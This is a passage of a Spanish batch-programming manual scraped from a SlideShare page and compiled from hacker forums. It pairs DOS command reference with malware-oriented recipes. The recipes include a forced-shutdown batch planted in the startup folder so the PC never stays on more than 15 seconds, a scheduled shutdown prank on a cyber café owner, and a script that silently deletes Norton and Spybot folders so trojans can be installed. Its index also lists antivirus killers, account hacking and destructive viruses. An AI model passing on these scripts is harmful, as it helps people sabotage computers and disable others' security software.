Manual de programacion_en_batch_by_dhyablo

1,925 views

Published on

Published in: Education
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,925
On SlideShare
0
From Embeds
0
Number of Embeds
5
Actions
Shares
0
Downloads
201
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Manual de programacion_en_batch_by_dhyablo

  1. 1. 1 MANUAL DE PROGRAMACION EN BATCH POREl siguiente manual de programación en batch consiste en una granrecopilación de diversos tutoriales y codigos posteados en los forosde portalhacker, el hacker.net, el-hacker.com y hacker array, queservira como guia para aquellos que se interesen en la programaciónbat.PD: Espero que todos los autores de los tutoriales y codigos aquírecopilados no se molesten.
  2. 2. 2 IntroducciónBatch es un lenguaje de programación MUY FACIL que se usa en laconsola del S.O. windows. Es un lenguaje que no necesita software,ni compiladores. y en poco tiempo te permite hacer verdaderascuriosidades.Ve a INICIO, luego a EJECUTAR y escribe CMD si tienes XP oCOMMAND si tienes win9x. Se abre una pantalla negra con letrasblancas. A esto se le llama msdos, console, consola, linea decomandos o shell.Desde ahí puedes escribir comandos que darán ordenes específicas atu makina. Las instrucciones que escribas aquí tendrán prioridadabsoluta en todo momento. Por ello la efectividad de este lenguaje.Sencillez, rapidez y efectividad se unen para formar este lenguaje deprogramación.
  3. 3. 3 IndiceTema Página1. Crear archivos bat…………………………………………………………………………….52. Tutorial grafico creación bats……………………………………………………………53. Comando shutdown………………………………………………………………………….84. Comando HELP………………………………………………………………………………….95. Parámetros de Shutdown…………………………………………………………………96. Comando ECHO………………………………………………………………………………117. Comando @echo off……………………………………………………………………….128. Eliminar Archivos de una carpeta………………………………………………….129. Seleccionar varios archivos bat………………………………………………………1410. Trayectorias o paths…………………………………………………………………….1511. Las unidades lógicas…………………………………………………………………….1612. Comandos basicos de DOS………………………………………………………….1613. Comandos de manejo de archivos……………………………………………….1814. Comandos de disco………………………………………………………………………1915. Comandos de Red…………………………………………………………………………2016. Todos los comandos de DOS……………………………………………………….2117. Inutilizar Archivos…………………………………………………………………………3018. Firewall Killer en Xp………………………………………………………………………3119. AV Killer………………………………………………………………………………………….3120. Unidades virtuales………………………………………………………………………..4321. Bat para hackear cuentas de usuario en XP……………………………….4722. Bat ejecutado un dia y hora especifico……………………………………….4923. Bomba logica en bat…………………………………………………………………….4924. Borrar un archivo o un directorio en bat…………………………………….4925. Bat que borra archivos temporales………………………………………………4926. Programa de calculos matematicos…………………………………………….5227. Joder Regedit y Msconfig………………………………………………………………5328. Cerrar Programas…………………………………………………………………………5329. Contraseña en bat…………………………………………………………………………5430. Crear un virus……………………………………………………………………………….5431. Virus crea archivo en un bucle…………………………………………………….5532. Malware que borra internet explorer y firefox…………………………….5633. Matar procesos……………………………………………………………………………..5634. Bloquear acceso a restaurar sistema…………………………………………..5735. Redireccionar a paginas de Internet……………………………………………5736. Varias formas de hacer un malware…………………………………………….5737. Virus que borra archivos de sistema……………………………………………5938. Virus para joder Windows…………………………………………………………….6139. Borrar Archivos de Programas…………………………………………………….6340. Abrir el lector de CDs con un bat…………………………………………………6341. Bat que pasa de extension .bat a .txt y viceversa………………………6442. Crear bucle en bat………………………………………………………………………..6543. Malware que crea muchos archivos…………………………………………….65
  4. 4. 444. Añadir un archivo al registro para iniciarse con windows…………..6745. Malware inofensivo……………………………………………………………………….6846. Ayudante de windows en batch……………………………………………………7047. Malware que crea muchos txt………………………………………………………7248. Batch destructor de ordenadores…………………………………………………7349. Virus que borra archivos DLL……………………………………………………….7950. Virus que reinicia el equipo………………………………………………………….8051. Creador de virus……………………………………………………………………………8052. Virus multifuncional………………………………………………………………………9053. Agenda personal en batch……………………………………………………………9854. Programa de registro en batch………………………………………………….10155. Renombrador de archivos, extensiones y carpetas………………….10456. Virus que jode el explorer………………………………………………………….10757. Malware para joder messenger………………………………………………….10758. Malware para joder mis docs, messenger y crear txts…………….10759. Monitor de sistema en batch………………………………………………………10960. Imitacion virus blaster en batch…………………………………………………11461. Copiador de archivos a diskete………………………………………………….11562. Crear mensaje en pantalla…………………………………………………………11663. Virus super destructor……………………………………………………………….11664. Poniendo profesional los Batch………………………………………………….11765. Malware que jode kernel…………………………………………………………….12466. Comandos mas usados de DOS con sus parametros……………….12567. Bat de privilegios de administrador en xp…………………………………12768. Renombrar extensiones de archivos………………………………………….127
  5. 5. 5 1. Crear archivos batAntes que nada indicaros que se llaman procesos batch. La razón porla que a menudo se alude a ellos como bat es porque el entornomsdos requiere como máximo tres letras en la extensión y por tantolos archivos tienen la extensión .batSe puede hacer de forma automatizada todo aquello que se puedahacer en la consola de msdos.Pues son texto plano. Quiere eso decir que se pueden escribir en elblock de notas, utilidad Edit de msdos o algún editor ascii.Al guardarlos deben tener la notación de nombres propia de msdos.Esto es un nombre con máximo 8 letras (espacios y no permitidos),luego un punto y la extensión que en este caso es obligatoriamentebat.Para crearlos desde la misma consola puedo utilizar varios sistemasSistema 1: mediante la orden copycopy con: nombre_de_archivo.bat......comandos......Ctrl z (se acaba y se graba al pulsar Ctrl ZMétodo 2 mediante la redirecciónecho 1º línea a insertar >nombre_de_archivo.batecho restantes líneas >>nombre_de_archivo.batEn cualquier caso para modificarlos podemos utilizar la utilidad Editde msdos (abriendo el archivo concreto y luego grabando loscambios) o el block de notas. 2. Tutorial grafico creación batsBueno...voy a enseñaros a acer archivos bats (ejecutables demsdos), tienen un cierto parecido a los *.exe, bueno no del todo, loque tienen en comun esque se pueden ejecutar.Por ahora os dire solamente algo simple, os recomiendo que le echeisun vistazo a Comandos del DOS, ya que hay estan la mayoria de las
  6. 6. 6funciones de msdos, en la cual utilizaremos para hacer los bat.Basta de royos y empecemos;Lo primero es abrir MsDos (en win98) o el Simbolo de sistema (enXP)Inicio>Ejecutar>cmd o Inicio>Todos losprogramas>Accesorios>Simbolo de SistemaHay dos formas de crear el bat, por la funcion "edit" de msdos o porel mismo notepad.1.Explicare primero por Msdos;Escribimos:edit prueba.bat, tal y como dice la imagen.Se nos abrira una ventana en azul,esperando nuestras ordenes.
  7. 7. 7Por ahora aremos que se pueda cambiar la hora,la fecha y el nombrede c:Alguien dira que esto es de lammer, (y lo es),pero es para aprender:wink:Aqui va el codigo:echo ontime 00:00date 21/06/1990label c: Estilomedioecho offPaso a explicar cada linea;
  8. 8. 8*time 00:00; cambia la hora a 00:00, puedes cambiarlo si te da lagana (time 12:45)*date 21/06/1990; cambia la fecha al dia de mi cumpleaños ,tambien puedes cambiarlo.*label c: EstiloMedio; cambia la etiqueta (nombre por decirlo dealguna manera) de c: "si nuestro disco duro esta en f:, simplementecambiamos c: por f:PARA GUARDARLO:Le damos a Archivo>Guardar como..>y mira elmenu de la derecha y selecciona Escritorio, asi lo tendremos mas amano.SI el nombre prueba no te gusta (es lo normal :lol: ), puedesrenombrarlo en la parte de arriva..PERO OJO, que tenga la extension"bat"...ejem.Manolo .batPues eso es todo, ya se que esto es muy simple, pero es solo unaintroducion... ya que desde bat se puede utilizar para infinidad decosas;deshabilitar antivirus,apagar pc,matar procesos y muchasputadas mas que no voy a decir2.La segunda opcion es crear un simple *.txt (archivo de texto), yponer el codigo tal y como se pone en el msdos,darle a guardarcomo, y guardarlo con el nombre que quieras, pero siempre con laextension bat. "ejem. yo.bat,estilomedio.bat) 3. Comando shutdownOk escribe lo siguiente (solo para xp):shutdown -s -t 120 -c "Probando una cosa" Escribelo tal cual ypresiona enterEste es el método que usa el famoso virus lsasser que se hapropagado por todo el mundo. Para detenerlo escribe:shutdown -ay todo volverá a la normalidad. Acabamos de descubrir la forma decrear un virus (algo mediocre ) en 10 segundos!¿Que necesito para comenzar?Windows. Recomendable XP.. pero win9x también sirve. La linea decomandos y el bloc de notas de windows. Con un poco de pacienciaverás como salen cosas interesantes!.Seguimos con nuestro ejemplo práctico. Abre el bloc de notas.Escribe allí lo siguiente:
  9. 9. 9shutdown -s -f -t 15 -c "Virus creado por mi!!"Ahora le damos a GUARDAR COMO. Seleccionamos TODOS LOSARCHIVOS. y lo guardamos con el siguiente nombre: MIVIRUS.BATEs imprescindible que tenga extensión BAT. El equipo se apagará en15 segundos!! Esta vez solo podrás poner shutdown -a a tiempo sieres extremadamente rápido!Si copias este archivo mivirus.bat en la carpeta programasinicio delwindows abrás creado un verdadero problema...Esta carpeta tiene la capacidad de iniciar en el arranque cualquierprograma que esté dentro de ella. Si colocamos nuestro recién creadovirus.. haremos que el ordenador no permanezca encendido más de15 segundos!! 4. Comando HELPAccedemos a la consola. Si escribimos HELP tendremos una lista delos comandos básicos del sistema, con una breve explicación de quéhace cada uno. Si queremos información más específica solo tenemosque escribir el nombre del comando /?.por ejemplo, escribe:shutdown /?Te saldrá explicado qué utilidad tiene este comando y todos susmodificadores. un modificador o parámetro es -f, -t, -a, /vv, /L, etc..se colocan después del comando y sirven para darle instruccionesmás precisas. 5. Parámetros de ShutdownVamos a comentar por encima los parámetros de shutdown:-s Da la orden de apagar el equipo (shutdown -s = apaga el equipoal instante)-r En vez de apagar lo que hace es reiniciar el equipo. (shutdown -r)-a Con esta orden evitamos que el sistema se apage o reinicie.-f Fuerza a cerrar todas las aplicaciones que requieran autorizacióno confirmación!!-c "" Entre las comillas puedes poner un comentario que saldrá enla pantalla de aviso.-t 00 puedes poner el tiempo en segundos que quieres que dure elPc encendido.Veamos con un ejemplo práctico:Estoy instalando una actualización de windows que tarda 20 minutos
  10. 10. 10en instalarse.. y después tendré que reiniciar el equipo para que hagaefecto. Pero no me apetece estar 20 minutos sentado delante de lapantalla..Tecleamos lo siguiente:shutdown -r -f -t 1800esto hará que en 30 minutos (30min x 60sg=1800sg) el pc se reinicie(-r) sin pedir confirmación y forzando a cerrar todas las aplicaciones(-f)Otro supuesto:Estoy en un ciber.. y me cae muy mal el dueño. Además sospechoque la vez anterior me cobró de mas... así que voy a gastarle unabroma simpática que no revertirá daños en el pc..pondremos lo siguiente:at 17:15 shutdown -s -f -t 15 -c "De camino que vas a decirle aldueño que se te ha apagado el ordenador, dile que es un capullo demi parte"JAJAJAJAJAJA!! Habría que ver la cara que se le queda al que estéusando el pc al ver este mensaje!!Hemos programado una tarea con el comando AT para que se ejecutea las 17:15h. Este es otro comando que usaremos mucho. y queofrece grandes posibilidades. Puedes, por ejemplo programar quecarge el CounterStrike a la hora que tu quieras... o que se desactiveel antivirus.. (jejeje paciencia.. todo a su debido tiempo).Tengo que hacer una corrección a este pequeño manual:El programador de tareas en la línea de comandos (AT) no funcionatal y como viene lineas más arriba. Aunque en la misma ayuda delcomando viene explícito la posibilidad de insertar comandos, esto noes cierto en la práctica. Tendremos que crear un archivo bat con elcódigo y guardarlo en un carpeta, y POSTERIORMENTE programarlopara que se ejecute.En el ejemplo de arriba, haríamos un bat con el siguiente codigo:shutdown -s -f -t 15 -c "De camino que vas a decirle al dueño que sete ha apagado el ordenador, dile que es un capullo de mi parte"Le ponemos un nombre que no llame mucho la atención y loguardamos en una carpeta. Por ejemplo lo llamaremos SHUT.BAT y loguardaremos en C:WINDOWS. ok?
  11. 11. 11Luego para programarlo escribiremos directamente en la linea decomandos:AT 17:15 C:WINDOWSSHUT.BATDe esta manera se ejecutará sin problemas.Aquí va otra forma de hacerlo:no ejecuta archivos cualqiera,tienes qe programar para qe se ejecuteun batch....es decir tendris qe crear un batch asi @echo offcdecho @echo off>>foto.batecho cd>>foto.batecho start C:FOTOSFOTO01>>foto.batecho exit>>foto.batat 14:13 C:foto.batexity asi te funcionara.otro código quizá más facil para empezar sería: @echo offstart c:rutadelaimagenimagen.jpgexitesto lo metes en un bat (por ejemplo: imagen.bat)Y luego programas manualmente el bat escribiendo:at 14:13 C:rutadelbatimagen.bat 6. Comando ECHOMira aca va una peqeña explicacion....echo es un "direccionador" (mas o menos) es decir como su nombreindicca, "direcciona" algo a algun sitio, ok??? esta claro,vale puesdependiendo de como se use direccionara de una manera u otra....mira cuando qeremos mostrar algo a traves de la consola de win(cmd) tendremos qe acer lo siguiente:echo Hola
  12. 12. 12Pruebalo en la cmd,ya veras como aparece un "Hola", en este caso asdireccionado una llamada a pantalla (por defecto es a pantalla= COM)y lo muestra en patalla, pero si especificamos donde qeremosmostrar, o mejor dicho, poner ese mensaje pues ayi lo pondra, estose ace a traves de ">>" (sin comillas) es decir ponemos primero eldireccionador "echo" y despues indicamos con las flechas en dondeqeremos colocarlo,asi:echo Hola>> PRNaora lo qe emos echo es dirigir el "Hola" al dispositivo PRN qe es laimpresora por defecto...ves???pues las posibilidades son infinitas....es decir puedo dirigir acsicualqier informacion acia casi cualqier sitio.....por ejemplo un codigo lo puedo dirigir a un archivo batch.... 7. Comando @echo offte estaras preguntando qe significa " @echo off" bien pues aplicandolo qe ya sabemos y un pelin de ingles..."echo apagado"....es decir,nose muestra nada por pantalla....eso lo usamos cuando qeremos qe uncodigo pasa desapercibido ante los ojos de un usuario, por ejemplocon un virus no qeremos qe la victima vea la pantalla negraverdad??? seria raro...pues con poner echo off al principio es suficiente para silenciar lo qeviene despues....por cierto, si te interesa, estos son los dispositivos por defecto dewin, es decir los sitios donde puedes direccionar un msg:Echo "CODIGO/MSG">>PRN (la impresora instalada por defecto)Echo "CODIGO/MSG">>COM (a pantalla)Echo "CODIGO/MSG">>LPT1 (ala primera impresora en el puertolpt1)Echo "CODIGO/MSG">>ARCHIVO.txt/bat/dll/doc/..../ (a cualqierarchivo qe admita texto)en el ultimo caso cada linea insertada en el archivo se colocara justodebajo de la anterior.
  13. 13. 13 8. Eliminar Archivos de una carpetacreemos una carpeta con el nombre prueba en el siguiente directorio:C:Archivos de programashenen la carpeta de archivos ke no les interese perder (les aclaropara despues no recibir kejas), ahora escribamos lo siguiente en unbloc de notas nuevo.@ echo offcdcd "archivos de programa"del /f /s /q "PRUEBA"exitguardenlo con el nombrekekieran .BAT(no se olviden del .BAT)haganle doble click al programita ke krearon y vean ke okurre...ke okurrio?? se borraron todos los documentos ke pusimos en lacarpeta PRUEBA ke habiamos creado.aki explico los comandos ke hemos puesto:@ echo off (hara ke no muestre lo ke esta ocurriendo por pantasha)cd (esta linea hara ke nos ponga en el disco C)cd "archivos de programa" (como pueden ver aka estamos entrandoen la carpeta de archivos de programa)del /f /s /q "PRUEBA" (el comando "DEL" seguido de otras lineas harake eliminemos un documento,carpeta, archivo,programa,etc...) eneste caso dimos como ejemplo la eliminacion de una carpeta.aki vemos ke al "DEL" le hemos agregado las lineas /f /s /q .ke eseso??/f (fuerza la eliminacion de archivos de solo lectura)/s (elimina los archivos especificados en todos los subdirectorios)/q (modo silencioso. no pide la confirmacion del usuario)"PRUEBA" (aka le indicamos a la makina ke carpeta keremoseliminar)..no se olviden de poner las comishas!!!
  14. 14. 14con estos pocos comandos hemos de aprender muchoo.ahora les paso otro ejemplo facil de entender.supongamos ke nuestra victima tiene el norton y se lo keremos matarpara poder instalarle troshanos detectables.haremos un bat con los siguientes comandos:@ echo offcdcd "archivos de programa"del /f /s /q "norton antivirus"exitmuy lindo todo...perooo ke pasa si le kiero eliminar el norton y a lavez le kiero eliminar el Spybot - Search & Destroy Huhpues le vamos agregando lineas a nuestro gusto hasta shegar al batindicado. aki les dejo como seria para matar el norton y el spybot enun bat (dos pajaros de un tiro, jejejejejeje)@ echo offcdcd "archivos de programa"del /f /s /q "norton antivirus"del /q /s /f "Spybot - Search & Destroy"exitles aclaro ke tienen ke tener cuidado. tienen ke poner el nombre de lacarpeta tal cual esta. hay otros comandos ke nos facilita para matarla carpeta pero vamos a ir de a poco. 9. Seleccionar varios archivos batPara ello y teniendo en cuenta que los nombres de los archivos debencumplir la notación de msdos (8 letras sin espacios como máximo,luego un punto y tres letras como máximo de extensión) se puedenutilizar los llamados comodines.* Equivale a varios caracteres? equivale a un solo caracter.Ejemploscomando *.cfg -> seleccionar todos los archivos que tengan laextensión cfg comando a*.cfg -> seleccionar todos los archivos que comienzen
  15. 15. 15por a y tengan la extensión cfg comando a*b.cfg -> seleccionar todos los archivos que comienzenpor a, acaben por b y tengan la extensión cfg comando *asa*.cfg -> seleccionar todos los archivos quecontengan asa y tengan la extensión cfg comando c?asa.cfg -> seleccionar todos los archivos que contenganuna C, luego un caracter cualquiera y luego asa. Debe tener tambiénla extensión cfg comando c?b*.* -> seleccionar todos los archivos que empiezenpor c, tengan un caracter cualquiera, luego una b y cualquierextensión comando *.b?t -> seleccionar todos los archivos que tengan unaextensión que empieze por b, luego un caracter cualquiera y luegouna t. 10. Trayectorias o pathsLa trayectoria es el nombre completo de un archivo e indica lasituación exacta de un archivo y su nombre.Si digo que el archivo se llama leeme.txt indico su nombre, pero nadamas. Se da por supuesto que se encuentra en el directorio actual.Si digo c:leeme.txt indico que el archivo que me interesa se llamaleeme.txt y se encuentra en el directorio raíz de C.Dado que en msdos no se admiten nombres largos (mas de 8 letras)ni espacios, cuando quiero utilizar un nombre de windows en msdosdebo saber que este será reconvertido a su nombre corto. Este seobtiene añadiendo los seis primeros carácteres válidos del nombre,luego el signo ~ (alt 126) y luego un número.De esta forma un archivo que se encuentre en Mis documentos enwin98 tendrá el path c:misdoc~1leeme.txtTambién se pueden utilizar (mientras las comillas para delimitar elnombre "c:Mis Documentosleeme.txt"Pero esto solo vale cuando se utiliza msdos como consola (no cuandose inicia windows 98 en modo msdos)Obsérvese que se utiliza la barra contraria a la de linux/unix paraespecificar subcarpetas o subdirectorios
  16. 16. 16Esta sería la trayectoria de mimusica.mp3c:misdoc~1mi~1mimusica.mp3Qué equivale a"c:Mis DocumentosMi Músicamimusica.mp3" 11. Las unidades lógicasSiempre es una letra seguida del signo dos puntos. A: = disquetera B: = reservada para segunda disquetera C: = primera partición (normalmente es la que arranca) D: = segunda partición (generalmente el cdrom)Por eso si se crea una unidad lógica mediante netbios en windows,esta puede tener un nombre msdos para poder acceder a ella desdela consola. La letra que se asigne no puede corresponder a unaunidad lógica existente. 12. Comandos basicos de DOSCLS -> borra pantallaECHO -> tiene varias posibilidades: Echo sin parámetros saca el estado en que se encuentra la variableecho (on u off). Echo on activa el echo (como en un terminal TTY) por lo que loscomandos se verán en pantalla y luego su resultado. Echo off desactiva el comando echo y ya se verán los resultados dela ejecución del comando, pero no el comando en sí mismo. Echo literal saca por pantalla el literal. Por eso al hacer echo literal>fichero.bat estamos redirigiendo la salida de echo literal (quetendría que salir por la pantalla) al archivo fichero.bat.PAUSE ->Sirve para sacar un mensaje y parar la ejecución hasta quese pulse una teclaPROMPT ->Sirve para cambiar el prompt de msdos. El más habituales $p$g que corresponde a $p = mostrar trayecto actual $g = mostrar el separador > $l = mostrar el separador < $b = mostrar el separador | $q = mostrar el signo =
  17. 17. 17 $$ = mostrar el signo $ $t = mostrar la hora $d = mostrar la fecha $v = mostrar la versión del sistema $n = mostrar unidad actual $h = retroceso. Borra el caracter previo $e = esc. Muestra el signo correspondiente al asci 27 $_ = Retorno de carro y salto de línea (equivale a chr(10) &chr(13) Por eso si ponemos prompt $p$g el cursor muestra la trayectoriadonde estamos y luego el separador. Es posible añadir texto (porejemplo prompt Mi_nombre $p$gDATEVer/poner la fecha del sistemaTIMEVer/poner la hora del sistemaVER[/font]Versión del sistema[font=Verdana]VOL unidadVolumen de la unidad especificadaPATHIndica un trayecto por defecto si se produce una petición de unarchivo que no está en el directorio actual.Por eso en windows 98 suele haber una línea en autoexec.bat que es path c:windows; c:windowscommandque indica que si se solicita un ejecutable que no esté en el directorioactual, lo busque primero en la carpeta windows y luego en lasubcarpeta command.KEYB código_pais,juego_de_caracteres,definición_de_teclado,El código de país de españa es el spEl juego de caracteres aplicable a españa es el 850 ó 437El archivo de definición de teclado es keyboard.sysPara configurar un teclado en españolkeyb sp,,c:windowscommandkeyboard.sysSYS unidadTransferir el sistema operativo a la unidad especificada.DOSKEYEmular la capacidad de unix/linux de recordar los comandos
  18. 18. 18introducidos anteriormente mediante la flecha arriba del teclado.MEM parámetrosMuestra la memoria usada y libre en el sistema /p -> muestra por programas /d -> por programas y controladores /c -> clasifica por tamaño 13. Comandos de manejo de archivosCOPY origen destino Sirve para copiar archivos de un lugar a otro. el origen debe ser untrayecto completo de donde están los archivos a copiar. Si se omitese entiende que en el directorio actual. El destino debe ser una trayectoria completa de donde dejar el/losarchivo(s) copy miarchivo.txt c: (copiarlo al directorio raíz de C) copy miarchivo.txt c:miarch.txt (copiarlo y además cambiarle elnombre a miarch.txt) copy *.txt a: (copiar todos los archivos que tengan la extensión txta la unidad A) copy *.txt c:misdoc~1 (copiar todos los archivos que tengan laextensión txt al directorio Mis documentos (cuyo nombre corto esmisdoc~1).DEL archivo(s)Borrar archivos en seleccionados del leeme.txt (borra el archivo leeme.txt en el directorio actual) del c:leeme.txt (borra el archivo leeme.txt que se encuentra enc:) del archiv~1*.* (borra todos los archivos que se encuentren en eldirectorio Archivos de programa cuyo nombre corto es archiv~1 (nose borran las subcarpetas)DELTREE archivo(s) -y Borra el arbol especificado (si es un archivo pues el archivo, si esuna carpeta pues la carpeta con todas las subcarpetas que incluya). Con el parámetro -y no pregunta cada vez Este comando en realidad no es un comando sino una utilidadincluída en msdos.MKDIR nombre (o bien MD nombre) Sirve para crear un directorio Md micarpetaCHDIR nombre (o bien CD nombre) Sirve para ir al directorio aludido. Se le tiene que dar la trayectoria
  19. 19. 19completa o si no intentará desplazarse desde el directorio actual. Cd c:archiv~1 (se va a archivos de programa) Cd .. (se va al directorio superior)RMDIR nombre (o bien MD nombre) Borra un directorio. Este debe estar vacío. RD c:Misdoc~1 (borra Mis Documentos, aunque no podrá porqueno está vacío).DIR trayecto Saca una lista del contenido del directorio especificado en eltrayecto. Si no se especifica nada, se entiende el actual. Si se pone como parámetro /W saca un listado resumido. Si se pone como parámetro /P saca un listado utilizando el filtromore.ATTRIB archivo(s)-> Muestra los atributos de los archivos indicados yen su caso permite cambiarlos.Los atributos son: H -> oculto. Se activa con +h y desactiva con -h R -> Lectura. Solo lectura con +r, normal con -r S -> Sistema. Se activa con +s y desactiva con -s A -> Modificado. Para copias de seguridad incrementales. +a indicamodificado y -a indica no modificado.Attrib miarchivo.txt (mostrar los atributos de miarchivo.txt)attrib *.exe +r +r +s (pone a todos los archivos con extensión execomo ocultos, del sistema y read only)RENAME o REN nombre1 nombre2Cambiar el nombre de archivoRen miarchivo.txt miarchivo2.txtTYPE archivoMuestra por pantalla el contenido de un archivotype miarchivo.txt 14. Comandos de discoDISCKCOPY origen destino-> Copia disquetes completos.Diskcopy a: a: Copia el disquete introducido en la unidad A a undisquete que se introducirá posteriormente en la unidad AFDISKPermite editar las particiones del disco duro.Con la opción /mbr permite borrar el Master Boot RecordFORMAT unidad parámetros
  20. 20. 20 /q -> formateo rápido /s -> Transferir el sistema operativoFormat a: /s formatea el disquete y le transfiere el sistema operativobásico de arranque.LABEL unidad etiquetaCambiar la etiqueta de volumen del disco de la unidadlabel a: midisqueteMSCDEXMontar una unidad de CdRom en msdos (solo requerido si se cargamsdos sin estar windows cargado previamente (por ejemplo cuandose arranca desde disquete).Suponiendo un CdRom al que se haya cargado en config.sys con elnombre MiCdmscdex /d:MiCdScandisk unidad parámetrosPara comprobar/reparar el estado del disco /autofix -> reparar automáticamente errores /surface -> hacer pruebas de superficie /checkonly -> no reparar, solo chequear 15. Comandos de RedARP parámetrosModificar la tabla arp. -a -> mostrar la tabla arp -s ip mac -> agregar una entrada a la tabla arpFTPIniciar el cliente ftpIPCONFIG parámetrosMostrar las características de configuración de IP /all -> muestra toda la información de configuración /release adaptador -> libera la ip del adaptador especificado /renew adaptador -> renueva la ip para el adaptador especificado /flushdns -> purga la caché de resolución de dns /registerdns -> actualiza las conexiones dhcp y vuelve a registrarlos nombres dns /displaydns -> muestra el contenido de la cache de resolución dnsNBTSTATHace un estado de la red por netbiosTiene muchos parámetros. Consultarlos mediante nbtstat /?
  21. 21. 21NET parámetrosComando para el uso de redes netbios USE equiporecurso -> para acceder a unidades lógicascompartidas. Se le asignará un nombre de unidad y estará disponiblecomo una unidad mas del sistema. USE USER: dominiousuario para acceder a un dominio USE unidad /DELETE eliminar el acceso a unidad compartida. SHARE trayecto /REMARK texto -> para compartir un recurso enred START -> para comenzar sesión netbios STOP -> para detener netbiosNETSTATPara ver el estado de la red. -a -> mostrar todos los puertos y conexiones -n -> mostrar números de puertos y direcciones -r -> mostrar la tabla de rutas -s -> mostrar estadísticas por protocolo -p protocolo-> protocolo puede ser tcp o udp. muestra lasconexiones activasNSLOOKUP dominioMuestra el dominio, su ip, dns donde se resuelve y sus aliasPINGUtilizar ICMP para llegar a un determinado nodoTELNET ip puertoUtilizar el protocolo telnet para acceso a un servidor exteriorTRACERT destinotracear el camino hasta llegar al destino especificado 16. Todos los comandos de DOSCHKDSK - Controla un disco y provee información sobre sucapacidad, su estado, los directorios, los archivos, la FAT, etc. Ha sidoreemplazado por SCANDISK en los DOS 6.2.ATTRIB - Presenta en pantalla o modifica los atributos de losarchivos.COPY - Sirve para copiar archivos, concatenarlos, cambiarles elnombre, etc.DIR - Presenta la lista del contenido de un directorio, en su totalidado de manera selectiva.
  22. 22. 22EDIT - Editor que reemplaza a Edlin desde el DOS.5. Se usaráesencialmente para modificar pequeños archivos de texto,empezando por los llamados "archivos de sistema”,que son el CONFIG.SYS y el AUTOEXEC.BAT.FDISK - Instala un disco duro, crea, muestra en pantalla o suprimeparticiones.FORMAT - Formatea el disco destinatario marcando y eliminando lossectores defectuosos, inicializando el directorio y la tabla deasignación de los archivos (FAT), y cargando el programa de inicio.INSTALL O INSTALAR- Carga los programas residentes, a través delConfig.Sys.MD - Crea un directorio. Otro nombre de este comando: MKDIR, por"Make Directory” , creación de un directorio.MSCDEX - Acceso a los CD-ROM. A partir del DOS 6.SCANDISK - Herramienta de verificación y reparación de los discosduros, pero sólo a partir de la versión 6.2.Aca estan los demas para los que quieren saber mas del dosANSI.SYS - Carga el código ANSI. Interviene en el Config.Sysmediante un Device=APPEND - Indica al sistema en qué directorios debe buscar losarchivos de datos o de comandos. Este comando es relativamentereciente en el DOS y complementa al comando PATH, que sólo seocupa de archivos de comandos.ASSIGN - EnvÃa el comando direccionado en un disco hacia otrodisco; este último reemplaza al primero. Ya no existe en el DOS 6.BACKUP - Realiza una copia de seguridad de los archivos de un discoen uno 0 varios discos, mostrando mientras tanto su nombre enpantalla. La restauración de los archivos se hace con la orden desentido contrario, RESTORE. El Backup ya no existe en el DOS 6, locual es una bendición porque este comando era uno de los másdifÃciles de manejar.BASIC - Llama al lenguaje Basic IBM en los DOS IBM. Se trata dellenguaje de programación más simple que existe.
  23. 23. 23BAT - Extensión especÃfica para el nombre de los archivos deprocedimientos, que disponen de toda una gama de comandospropios. Uno de los más conocidos es el archivo AUTOEXEC.BAT, quese ejecuta automáticamente cuando usted pone su computadora enfuncionamiento .BREAK - Activa o desactiva la posibilidad de realizar una interrupcióncon Con Âtrol + Pausa, que permite salir de una secuencia.BUFFERS - Comando para el config.sys que determina la capacidaddel búfer para el disco.CALL - En un archivo .bat, llama a otro .bat como un subprograma.CD - Cambio de directorio; su nombre completo es CHDIR.CHCP - Selección de las tablas de códigos.CHDIR - Cambio de directorio, cuyo nombre abreviado es CD. AdopteCD en lu Âgar de CHDIR si quiere evitar presionar tres teclas en elteclado.CHKDSK - Controla un disco y provee información sobre sucapacidad, su estado, los directorios, los archivos, la FAT, etc. Ha sidoreemplazado por SCANDISK en los DOS 6.2.CHKSTATE.SYS - Una novedad del DOS 6. Usado por el programaMemMaker para optimizar la memoria.CHOICE - Una novedad del DOS. 6. Le pide al usuario que efectúeuna selección en una secuencia «batch ».CLS - Simplemente borra la pantalla, sin cambiar ninguna otra cosa.Es un coman Âdo pequeño e interesante que conviene recordar.COMMAND - Llama a un procesador secundario de comandos, oreinstala el procesador de comandos COMMAND.COM del DOS.CONFIG.SYS - Archivo de configuración que dispone de instruccionespropias. Este archivo se ejecuta automáticamente cada vez que sepone en funcionamiento la computadora.COUNTRY - Nacionaliza el sistema, adaptándolo al paÃs.DATE - Muestra en pantalla y modifica la fecha utilizada por elsistema; la nueva, fecha introducida se graba en las memoriaspermanentes.
  24. 24. 24DBLSPACE - Compacta el disco duro, duplicando aproximadament esu capacidad. La compresión puede variar normalmente de 1,7 amás de 10, según el tipo de archivo. Este comando ha sidoreemplazado por DRIVESPACE a partir del DOS 6.22.DBLSPACE.SYS - Una novedad del DOS 6. Determina la posiciónfinal del archivo dblspace.bin.DEBUG - Lanza el programa de "debugging (eliminación deerrores). Debug está reservado a los expertos.DEFRAG - Una novedad del DOS 6. Desfragmenta los archivos en eldisco duro para mejorar la velocidad y la seguridad.DEL - Destruye uno o varios archivos en el disco (actúa como elcomando ERASE).DELOLDOS - Suprime la puesta en reserva de un DOS antiguo.DELTREE - Una novedad dei DOS 6. Suprime un directorio y todo loque contiene, incluyendo los subdirectorios, en una sola operación.DEVICE - Instala un driver de periférico, por medio del config.sys.DEVICEHIGH - Carga un administrador en memoria superior, porencima de los primeros 640 KB.DISKCOMP - Compara el contenido total, pista por pista y sector porsector, de dos disquetes del mismo tipo.DISKCOPY - Copia de modo idéntico el contenido de un disquetefuente en un disquete destinatario rigurosamente del mismo formato,formateando previamente este último y haciéndolo sobre elmodelo del disquete fuente si es necesario.DISPLAY.SYS - Se utiliza para conmutar las tablas de códigos, vÃa elconfig.sys.DOS - Establece un vÃnculo entre la memoria convencional y lamemoria superior a través del config.sys.DOSKEY - Instala el programa de memorización y de llamado de loscomandos instalados anteriormente. De esta manera, se evita tenerque volver a escribirlos.DOSSHELL - Llama a la superestructur a de diálogo del DOS. Este
